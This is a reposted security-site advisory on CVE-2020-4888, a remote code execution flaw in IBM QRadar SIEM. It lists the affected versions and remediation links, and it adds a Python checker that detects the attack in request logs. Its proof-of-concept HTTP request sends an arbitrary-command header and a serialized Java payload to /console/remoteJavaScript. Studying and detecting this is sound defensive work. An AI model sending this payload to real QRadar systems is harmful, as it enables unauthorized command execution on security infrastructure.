IBM QRadar SIEM Remote Code Execution Vulnerability (CVE-2020-4888 POC)

admin, 6 May 2021 04:24:35




IBM QRadar SIEM is a security intelligence solution from IBM (USA) that protects assets and information from advanced threats. It provides monitoring across the entire IT infrastructure and generates detailed reports on data access and user activity.


Affected product: IBM QRadar SIEM


  • 7.4.0 to 7.4.2 Patch 1 

  • 7.3.0 to 7.3.3 Patch 7 


These versions contain a security vulnerability that allows a remote attacker to execute arbitrary commands on the system.


POC:


POST /console/remoteJavaScript HTTP/1.1
Host: <Host>
User-Agent: python-requests/2.24.0
Connection: close
SEC: af4420ac-7116-4be9-b7b9-94c4595c7a42
Cookie: JSESSIONID=A7526C2DD5CE837DF89E0B3D0D242880;
Content-Length: 8745
cmd: <Command Here>

{"method": "qradar.getColumnDefinitionString", "QRadarCSRF": "a849abdb-f64f-495f-9407-2eafe3b074d0", "id": "63274893", "params": {"variables": "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%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%2bsABAATAAABsRICuAADEgS2AAVLEgYSB7YABUwSBhIItgAFTRIJEgq2AAVOLQS2AAstKiq2AAwQ7362AA4tKyu2AAwQ7362AA4tLCy2AAwQ7362AA4qBLYACysEtgALLAS2AAssAbYAD8AAEDoEKwG2AA/AABA6BSoBtgARNgYZBcYAGBkFtgASwAATwAATEhS5ABUCAKcABAE6BxUGmQANGQTGAAgZBccAJCsBuwAQWbcAFrYAFywBuwAQWbcAFrYAFyoBBLYAGKcA6BkHxgDjGQS2ABLAABk6CBkIuQAaAQBXGQi5ABoBADoJEhsSHLYABToKGQoEtgALGQoZCLYAD8AAHToLEh0SHrYABToMGQwEtgALGQwZC7IAH7YAFwQ2DRIguAAhOg4ZDsYAExkOtgAiEiO2ACSZAAYDNg0VDZkAGQa9ACVZAxImU1kEEidTWQUZB1OnABYGvQAlWQMSKFNZBBIpU1kFGQdTOg%2b4ACoZD7YAK7YALDoQuwAtWRkQtwAuEi%2b2ADA6ERkRtgAxmQALGRG2ADKnAAUSMzoSGQkZErYANBkJtgA1GQm2ADanAAhLKrYAOLEAAQAAAagBqwA3AAQAPgAAALYALQAAABsACwAcABMAHQAbAB4AIwAfACgAIAA0ACEAQAAiAEwAIwBRACQAVgAlAFsAJwBdACgAZQApAG8AKgB2ACsAkwAsAKIALQCuAC4AugAvAMMAMADIADEA0gAyANoAMwDjADQA7AA1APIANgD%2bADcBBwA4AQ0AOQEXADsBGgA8ASEAPQEzAD4BNgBAAWYAQQFzAEIBgwBDAZcARAGeAEUBowBGAagASwGrAEkBrABKAbAATAA/AAAAygAUANIA1gBQAFEACADjAMUAUgBTAAkA7AC8AFQAVQAKAP4AqgBWAFcACwEHAKEAWABVAAwBGgCOAFkAWgANASEAhwBbAFwADgFmAEIAXQBeAA8BcwA1AF8AYAAQAYMAJQBhAGIAEQGXABEAYwBcABIACwGdAGQAVQAAABMBlQBlAFUAAQAbAY0AZgBVAAIAIwGFAGcAVQADAGUBQwBoAGkABABvATkAagBpAAUAdgEyAGsAWgAGAJMBFQBsAFwABwGsAAQAbQBuAAAAbwAAABYAAgBlAUMAaABwAAQAbwE5AGoAcQAFAHIAAAB4AAz/AJAABwcAcwcAcwcAcwcAcwcAdAcAdAEAAEAHAHX8ABAHAHUg/wByAA8HAHMHAHMHAHMHAHMHAHQHAHQBBwB1BwB2BwB3BwBzBwB4BwBzAQcAdQAAGlIHAHn%2bAC4HAHkHAHoHAHtBBwB1/wASAAAAAEIHAHwEAAEAfQAAAAIAfnVxAH4AFwAAAdTK/rq%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%2b4xAgACTAAKX2JlYW5DbGFzc3EAfgAcTAAEX29ianEAfgAJeHBxAH4AH3EAfgAUc3EAfgAbdnEAfgACcQB%2bAA1zcQB%2bACBxAH4AI3EAfgANcQB%2bAAZxAH4ABnEAfgAGeA%3d%3d"}}
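As an added example for defenders (this is not code from the original post and not IBM's code), the following Python checker inspects a logged HTTP request for the shape of the POC above: a POST to /console/remoteJavaScript, the non-standard cmd header, the qradar.getColumnDefinitionString method, and a params.variables value that URL- and then base64-decodes to a Java serialization stream (the AC ED 00 05 stream header; the fragments visible in the POC, such as cQB%2bAA and the base64 of _beanClass, are consistent with such a stream). The request representation (method, path, header dict, body string) and the sample bodies are constructed for this example, since the beginning of the page's own payload is not reproduced here.

```python
import base64
import binascii
import json
import urllib.parse

# Values taken from the POC request above.
VULN_PATH = "/console/remoteJavaScript"
SUSPECT_METHOD = "qradar.getColumnDefinitionString"
# Header bytes written by java.io.ObjectOutputStream (STREAM_MAGIC + STREAM_VERSION).
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"


def decode_variables(value):
    """URL-decode, then base64-decode, the params.variables field.

    The POC carries '+' as %2b, so the standard (not urlsafe) alphabet applies.
    Returns None when the value is not a decodable base64 string.
    """
    try:
        return base64.b64decode(urllib.parse.unquote(value), validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_request(method, path, headers, body):
    """Return a list of findings for one request; an empty list means nothing notable."""
    findings = []
    if method.upper() != "POST" or urllib.parse.urlsplit(path).path != VULN_PATH:
        return findings
    lowered = {k.lower(): v for k, v in headers.items()}
    if "cmd" in lowered:
        findings.append("non-standard 'cmd' request header present")
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        findings.append("body is not valid JSON")
        return findings
    if doc.get("method") == SUSPECT_METHOD:
        findings.append("JSON method %s invoked" % SUSPECT_METHOD)
    params = doc.get("params")
    variables = params.get("variables") if isinstance(params, dict) else None
    if isinstance(variables, str):
        blob = decode_variables(variables)
        if blob is not None and blob.startswith(JAVA_SERIAL_MAGIC):
            findings.append("params.variables decodes to a Java serialization stream (AC ED 00 05)")
    return findings


# Constructed sample bodies (not the page's payload): a plausible benign call and a
# POC-shaped request whose variables field is a tiny made-up serialization stream.
BENIGN_BODY = json.dumps(
    {"method": "qradar.getVersion", "QRadarCSRF": "x", "id": "1", "params": {}}
)
_fake_stream = JAVA_SERIAL_MAGIC + b"sr\x00\x0a_beanClass"
SUSPECT_BODY = json.dumps({
    "method": SUSPECT_METHOD,
    "QRadarCSRF": "x",
    "id": "63274893",
    "params": {"variables": urllib.parse.quote(base64.b64encode(_fake_stream).decode())},
})


def demo():
    """Run the checker over three constructed requests and return findings per request."""
    return {
        "benign": inspect_request("POST", VULN_PATH, {"Host": "qradar.example"}, BENIGN_BODY),
        "wrong_path": inspect_request("POST", "/console/login", {"cmd": "<Command Here>"}, SUSPECT_BODY),
        "poc_shaped": inspect_request(
            "POST", VULN_PATH, {"Host": "qradar.example", "cmd": "<Command Here>"}, SUSPECT_BODY
        ),
    }


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits or ["clean"])
```

A rule keyed only on the cmd header is weak, because that header name is chosen by whoever sends the request; the check on the decoded params.variables content is the sturdier signal, and it also catches a serialized object sent under a different JSON method name. Unpatched hosts should still be upgraded to the versions listed under the remediation advice; this checker only helps spot attempts in request logs.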




Remediation advice

        

The vulnerability has been fixed; upgrading to one of the following versions is recommended:

QRadar/QRM/QVM 7.4.2 Patch 2

Download link:

https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Vulnerability+Manager&release=All&platform=All&function=fixId&fixids=7.4.2-QRADAR-QRSIEM-20210120225428&includeRequisites=1&includeSupersedes=0&downloadMethod=http&source=SAR

 

QRadar/QRM/QVM 7.3.3 Patch 7 IF 1

Download link:

https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Vulnerability+Manager&release=All&platform=All&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20210120163940INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http&source=SAR



This article first appeared on the WeChat public account Khan安全团队 (Khan Security Team): IBM QRadar SIEM Remote Code Execution Vulnerability (CVE-2020-4888 POC)

Reposting: please keep the link to this article (CN-SEC中文网; thanks to the original author for their work): http://cn-sec.com/archives/272016.html
